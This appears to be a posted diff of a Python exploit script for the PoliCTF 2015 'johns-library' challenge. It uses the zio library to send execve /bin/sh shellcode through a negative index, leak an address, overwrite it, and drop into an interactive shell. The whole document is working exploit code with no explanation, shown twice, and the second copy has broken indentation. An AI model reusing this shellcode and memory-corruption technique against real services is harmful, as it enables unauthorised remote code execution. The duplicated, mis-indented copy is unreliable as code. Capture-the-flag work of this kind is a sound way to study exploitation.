evernick · July 14, 2015 05:45
diff --git a/johns-library_exploit.py b/johns-library_exploit.py
 from zio import *
 import base64
 import binascii

 def exp():
    io = zio(('library.polictf.it', 80))
    #io = zio('./johns-library')

    shellcode = "\x31\xc9\xf7\xe9\x51\x04\x0b\xeb\x08\x5e\x87\xe6\x99\x87\xdc\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68"

    io.read_until('\n')
    io.writeline('a')
    io.read_until(':')
    io.writeline('-32')
    io.writeline(shellcode)
    io.read_until('\n')
    io.writeline('r')
    io.read_until(':')
    io.writeline('1')
    data = io.read_until('\n')
    idx = data.find('\x04\x08')
    print binascii.hexlify(data[idx-2:])
    data = data[idx+2:idx+6]
    print binascii.hexlify(data)
    io.writeline('a')
    io.read_until(':')
    io.writeline('0')
    #raw_input()
    io.writeline(data)
    io.interact()
 exp()
	from zio import *
	import base64
	import binascii

	def exp():
	io = zio(('library.polictf.it', 80))
	#io = zio('./johns-library')

	shellcode = "\x31\xc9\xf7\xe9\x51\x04\x0b\xeb\x08\x5e\x87\xe6\x99\x87\xdc\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68"

	io.read_until('\n')
	io.writeline('a')
	io.read_until(':')
	io.writeline('-32')
	io.writeline(shellcode)
	io.read_until('\n')
	io.writeline('r')
	io.read_until(':')
	io.writeline('1')
	data = io.read_until('\n')
	idx = data.find('\x04\x08')
	print binascii.hexlify(data[idx-2:])
	data = data[idx+2:idx+6]
	print binascii.hexlify(data)
	io.writeline('a')
	io.read_until(':')
	io.writeline('0')
	#raw_input()
	io.writeline(data)
	io.interact()
	exp()